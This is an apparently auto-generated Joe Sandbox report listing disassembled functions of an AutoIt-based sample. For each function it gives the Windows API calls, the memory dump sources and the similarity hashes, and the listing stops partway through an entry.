                                    Function 009B4DF2 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                    • String ID:
                                    • API String ID: 3016257755-0
                                    • Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                    • Instruction ID: a72d1a3ea0da921459526e574d5be0e0d00c2c308c89878973b0116e6701262f
                                    • Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                    • Instruction Fuzzy Hash: 9A01493200014EBBCF125E84DE059EE3F67BB58360B598455FE2859132D336DAB2BB81
                                    Function 009A7452 Relevance: 6.0, APIs: 4, Instructions: 47COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 009A7A0D: __getptd_noexit.LIBCMT ref: 009A7A0E
                                    • __lock.LIBCMT ref: 009A748F
                                    • InterlockedDecrement.KERNEL32(?), ref: 009A74AC
                                    • _free.LIBCMT ref: 009A74BF
                                    • InterlockedIncrement.KERNEL32(00C830C8), ref: 009A74D7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
                                    • String ID:
                                    • API String ID: 2704283638-0
                                    • Opcode ID: f74b1beac548dc6d550168576db1ddcd946c562d62b7baf927ace108970286d6
                                    • Instruction ID: e74b2aaa14292035a67d110b9218181065f38d888ae4fa3db5ad606e5371216c
                                    • Opcode Fuzzy Hash: f74b1beac548dc6d550168576db1ddcd946c562d62b7baf927ace108970286d6
                                    • Instruction Fuzzy Hash: F901D232909A21ABC712EFE59C0B75DFBB5BF4A721F148019F854A76A0CB345902CFD2
                                    Function 009A7A94 Relevance: 6.0, APIs: 4, Instructions: 41COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • __lock.LIBCMT ref: 009A7AD8
                                      • Part of subcall function 009A7CF4: __mtinitlocknum.LIBCMT ref: 009A7D06
                                      • Part of subcall function 009A7CF4: RtlEnterCriticalSection.KERNEL32(00000000,?,009A7ADD,0000000D), ref: 009A7D1F
                                    • InterlockedIncrement.KERNEL32(?), ref: 009A7AE5
                                    • __lock.LIBCMT ref: 009A7AF9
                                    • ___addlocaleref.LIBCMT ref: 009A7B17
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
                                    • String ID:
                                    • API String ID: 1687444384-0
                                    • Opcode ID: b4e4bd7211dff80ed91cba5969dfcbb3d9377e0df3ce37ba301b1d02b7157393
                                    • Instruction ID: 2060e8d4f53595837c6f27dafcf16c8d905e1a0f476c30ec6d910970e583995f
                                    • Opcode Fuzzy Hash: b4e4bd7211dff80ed91cba5969dfcbb3d9377e0df3ce37ba301b1d02b7157393
                                    • Instruction Fuzzy Hash: 1F011B72504B00AED721DFA5D90674AF7F0AF91325F20890EA49A966A0CB74A645CB91
                                    Function 009EE32E Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON
                                    Download Yara Rule
                                    APIs
                                    • _memset.LIBCMT ref: 009EE33D
                                    • _memset.LIBCMT ref: 009EE34C
                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00A43D00,00A43D44), ref: 009EE37B
                                    • CloseHandle.KERNEL32 ref: 009EE38D
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: _memset$CloseCreateHandleProcess
                                    • String ID:
                                    • API String ID: 3277943733-0
                                    • Opcode ID: 7fef4d8124f0ca4bd3d8cbf602b9dcd956f49a1fd0b6a76e122d210147fe29b4
                                    • Instruction ID: 4c8282847733270231fab82f021306d46b8531493b6c60fe1e2a371028820925
                                    • Opcode Fuzzy Hash: 7fef4d8124f0ca4bd3d8cbf602b9dcd956f49a1fd0b6a76e122d210147fe29b4
                                    • Instruction Fuzzy Hash: 70F089FB9403047EE71097E5AC45F777E6CD745758F104821FE04D61A2D3765D1146A4
                                    Function 009EEA6A Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0099AF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0099AFE3
                                      • Part of subcall function 0099AF83: SelectObject.GDI32(?,00000000), ref: 0099AFF2
                                      • Part of subcall function 0099AF83: BeginPath.GDI32(?), ref: 0099B009
                                      • Part of subcall function 0099AF83: SelectObject.GDI32(?,00000000), ref: 0099B033
                                    • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 009EEA8E
                                    • LineTo.GDI32(00000000,?,?), ref: 009EEA9B
                                    • EndPath.GDI32(00000000), ref: 009EEAAB
                                    • StrokePath.GDI32(00000000), ref: 009EEAB9
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                    • String ID:
                                    • API String ID: 1539411459-0
                                    • Opcode ID: 65267f76f000ba7dcc015188f8daae7f3e59a73d5ac59ae4001d4a5fa6c2ec1d
                                    • Instruction ID: ce6c54057da6545b9c731c934fd032dabd1ef74562250ddaabe3c31802f660dd
                                    • Opcode Fuzzy Hash: 65267f76f000ba7dcc015188f8daae7f3e59a73d5ac59ae4001d4a5fa6c2ec1d
                                    • Instruction Fuzzy Hash: 68F05E36005259BBDB12DFD4AD09FCA3F19AF06311F044201FE16610E187759563CBD5
                                    Function 009BC82D Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 009BC84A
                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 009BC85D
                                    • GetCurrentThreadId.KERNEL32 ref: 009BC864
                                    • AttachThreadInput.USER32(00000000), ref: 009BC86B
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                    • String ID:
                                    • API String ID: 2710830443-0
                                    • Opcode ID: 5319bfff1cd87094e9fee087ceb6bc1a682c4df15c146b1700d9d3aff3af5427
                                    • Instruction ID: fa39a212f6e343e6303ca2b49bb08acb959305949c7853e68f49bb64065d0cee
                                    • Opcode Fuzzy Hash: 5319bfff1cd87094e9fee087ceb6bc1a682c4df15c146b1700d9d3aff3af5427
                                    • Instruction Fuzzy Hash: 1BE0657254122876DB109FE1DC0DEDB7F2CEF057B1F008011B50D85450D672C582C7E0
                                    Function 009BB0CD Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetCurrentThread.KERNEL32 ref: 009BB0D6
                                    • OpenThreadToken.ADVAPI32(00000000,?,?,?,009BAC9D), ref: 009BB0DD
                                    • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,009BAC9D), ref: 009BB0EA
                                    • OpenProcessToken.ADVAPI32(00000000,?,?,?,009BAC9D), ref: 009BB0F1
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: CurrentOpenProcessThreadToken
                                    • String ID:
                                    • API String ID: 3974789173-0
                                    • Opcode ID: 8fe105730060df5d54bcc8cd6ca8b71762dfd99319132c6f0ca271989b0964f3
                                    • Instruction ID: a125e9d0d34c32da15f956ccb57fe7558b238093a233768674635b13d431ba57
                                    • Opcode Fuzzy Hash: 8fe105730060df5d54bcc8cd6ca8b71762dfd99319132c6f0ca271989b0964f3
                                    • Instruction Fuzzy Hash: 0DE086736012159BD720AFF15D0CB973BACEF557A1F018818F346DA080DB748403C761
                                    Function 0099B47D Relevance: 6.0, APIs: 4, Instructions: 22COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetSysColor.USER32(00000008), ref: 0099B496
                                    • SetTextColor.GDI32(?,000000FF), ref: 0099B4A0
                                    • SetBkMode.GDI32(?,00000001), ref: 0099B4B5
                                    • GetStockObject.GDI32(00000005), ref: 0099B4BD
                                    • GetWindowDC.USER32(?,00000000), ref: 009FDE2B
                                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 009FDE38
                                    • GetPixel.GDI32(00000000,?,00000000), ref: 009FDE51
                                    • GetPixel.GDI32(00000000,00000000,?), ref: 009FDE6A
                                    • GetPixel.GDI32(00000000,?,?), ref: 009FDE8A
                                    • ReleaseDC.USER32(?,00000000), ref: 009FDE95
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                    • String ID:
                                    • API String ID: 1946975507-0
                                    • Opcode ID: 6535d31997d93bf65d93f2080bdb60eacfbdda8451ba83be4beebfcc68cf40e5
                                    • Instruction ID: a5beab6d52c2f7814ba63ba8e3090bd7f4542ae0ba328f32f8013e41a893c929
                                    • Opcode Fuzzy Hash: 6535d31997d93bf65d93f2080bdb60eacfbdda8451ba83be4beebfcc68cf40e5
                                    • Instruction Fuzzy Hash: B0E0ED32100248AAEF219BE8AC0DBE83F15AB55339F14C766FB6A580E1C7714592DB11
                                    Function 009FB29A Relevance: 6.0, APIs: 4, Instructions: 20COMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: CapsDesktopDeviceReleaseWindow
                                    • String ID:
                                    • API String ID: 2889604237-0
                                    • Opcode ID: 0d4fec64197882f63e21ff0636da70b1091052c8a15c0612a4ac14fb83b31080
                                    • Instruction ID: 0915a9110fad445a70ac9a25312ce5ffd8c4a5b75112acdfbd9809726df00e8e
                                    • Opcode Fuzzy Hash: 0d4fec64197882f63e21ff0636da70b1091052c8a15c0612a4ac14fb83b31080
                                    • Instruction Fuzzy Hash: 3DE04FB2100208EFDB009FF0C84866E7BA4EB4C351F11C809FD5A87210DB7998438B40
                                    Function 009BB2D4 Relevance: 6.0, APIs: 4, Instructions: 20synchronizationCOMMON
                                    Download Yara Rule
                                    APIs
                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 009BB2DF
                                    • 74745030.USERENV(?,?), ref: 009BB2EB
                                    • CloseHandle.KERNEL32(?), ref: 009BB2F4
                                    • CloseHandle.KERNEL32(?), ref: 009BB2FC
                                      • Part of subcall function 009BAB24: GetProcessHeap.KERNEL32(00000000,?,009BA848), ref: 009BAB2B
                                      • Part of subcall function 009BAB24: HeapFree.KERNEL32(00000000), ref: 009BAB32
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: CloseHandleHeap$74745030FreeObjectProcessSingleWait
                                    • String ID:
                                    • API String ID: 443658836-0
                                    • Opcode ID: 5b1f514c75f931fa988e86b78d80fc0a233c70b404b1388c44eef80eb814f4c3
                                    • Instruction ID: 4bee7750e9294dc8818bba5659998a05c8aa5d9ee9b224b1d86e4d4421de7552
                                    • Opcode Fuzzy Hash: 5b1f514c75f931fa988e86b78d80fc0a233c70b404b1388c44eef80eb814f4c3
                                    • Instruction Fuzzy Hash: C5E0BF37104009BBCB016BD5EC08859FF66FF883213109221F62581571CB329473EB52
                                    Function 009FB2AE Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: CapsDesktopDeviceReleaseWindow
                                    • String ID:
                                    • API String ID: 2889604237-0
                                    • Opcode ID: f4d0b3bcd372e7bc06134cf14348668a6795025a4b0a7c4cdc8706a51ef09f1f
                                    • Instruction ID: f3d48b6fc02f2c0dec7c88d101fa13bd71434b65aaedaf02c62e7a5c6a801127
                                    • Opcode Fuzzy Hash: f4d0b3bcd372e7bc06134cf14348668a6795025a4b0a7c4cdc8706a51ef09f1f
                                    • Instruction Fuzzy Hash: 89E046B2500208EFDF009FF0C84862DBBA8EB4C351F118809F95E8B210DB7A98438B00
                                    Function 009BDCDF Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 240comCOMMON
                                    Download Yara Rule
                                    APIs
                                    • OleSetContainedObject.OLE32(?,00000001), ref: 009BDEAA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: ContainedObject
                                    • String ID: AutoIt3GUI$Container
                                    • API String ID: 3565006973-3941886329
                                    • Opcode ID: b692fab3c2879ada86d040e5c3dcd7a93653d0a13740646cde0053ac82747b38
                                    • Instruction ID: 471ae615761f8dfff54ba510d19b29f99eb187dfb83bc6dc6d7a6abd35d8f5d7
                                    • Opcode Fuzzy Hash: b692fab3c2879ada86d040e5c3dcd7a93653d0a13740646cde0053ac82747b38
                                    • Instruction Fuzzy Hash: EF914A70601701AFDB14CF64C984BAAB7F9BF88720F10896DF94ACB691EB70E841CB50
                                    Function 0099BCC9 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143sleepCOMMON
                                    Download Yara Rule
                                    APIs
                                    • Sleep.KERNEL32(00000000), ref: 0099BCDA
                                    • GlobalMemoryStatusEx.KERNEL32 ref: 0099BCF3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: GlobalMemorySleepStatus
                                    • String ID: @
                                    • API String ID: 2783356886-2766056989
                                    • Opcode ID: f92b4ae3a1fc7f34481add744472d8b418eabaa6bbbc07e40fe1bc2137b10652
                                    • Instruction ID: cdf67357d8fa45c69f8248268824e24c0dc8fecfbe837ead62c5c0ca5a991cf2
                                    • Opcode Fuzzy Hash: f92b4ae3a1fc7f34481add744472d8b418eabaa6bbbc07e40fe1bc2137b10652
                                    • Instruction Fuzzy Hash: 67512571409748ABE720AF58DC86BAFBBE8FFD4354F41484EF1C8410A6EB7085A9C756
                                    Function 009CC56D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 009844ED: __fread_nolock.LIBCMT ref: 0098450B
                                    • _wcscmp.LIBCMT ref: 009CC65D
                                    • _wcscmp.LIBCMT ref: 009CC670
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: _wcscmp$__fread_nolock
                                    • String ID: FILE
                                    • API String ID: 4029003684-3121273764
                                    • Opcode ID: 4ad0804f88de715d907ab2a44e1871eafa7f8889f6586242b64429e00ebc1812
                                    • Instruction ID: ef38fea2c0c6813c57bbfa87c0b22a6a59ebba2e49a03420445f86801f2ab5c0
                                    • Opcode Fuzzy Hash: 4ad0804f88de715d907ab2a44e1871eafa7f8889f6586242b64429e00ebc1812
                                    • Instruction Fuzzy Hash: D5419672A0021ABBDF10AAA4DC42FEF7BB9AF89714F004479F605E7191D6759A048B51
                                    Function 009EA76A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 009EA85A
                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 009EA86F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: MessageSend
                                    • String ID: '
                                    • API String ID: 3850602802-1997036262
                                    • Opcode ID: ded10e94dcd257fcb6ceb8613007ec0ad6f595f6ffe0724366a0dd8e0b36ab2a
                                    • Instruction ID: bc98c4883f003762d28e6be83bc15eba62c8c7c2933411bbaae0d85737d71b38
                                    • Opcode Fuzzy Hash: ded10e94dcd257fcb6ceb8613007ec0ad6f595f6ffe0724366a0dd8e0b36ab2a
                                    • Instruction Fuzzy Hash: 0B410A75E013499FDB15CFA9C880BDABBB9FB49300F11006AE905AB351D775AD42CFA1
                                    Function 009D5180 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96networkCOMMON
                                    Download Yara Rule
                                    APIs
                                    • _memset.LIBCMT ref: 009D5190
                                    • InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 009D51C6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: CrackInternet_memset
                                    • String ID: |
                                    • API String ID: 1413715105-2343686810
                                    • Opcode ID: 26b24f2bc8f7b806cf3fa69ca18a3ad763b437f7fde5218e6232ea58765b26f9
                                    • Instruction ID: 56c262b60fc5641bb00b26b0961ccc8b275a6e9c97c4dbd96569538433fdc9b7
                                    • Opcode Fuzzy Hash: 26b24f2bc8f7b806cf3fa69ca18a3ad763b437f7fde5218e6232ea58765b26f9
                                    • Instruction Fuzzy Hash: 82313C71C00119ABCF01EFE4CC85AEE7FB9FF54750F10401AF915A6266DB31AA06DBA0
                                    Function 009E975A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                                    Download Yara Rule
                                    APIs
                                    • DestroyWindow.USER32(?,?,?,?), ref: 009E980E
                                    • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 009E984A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
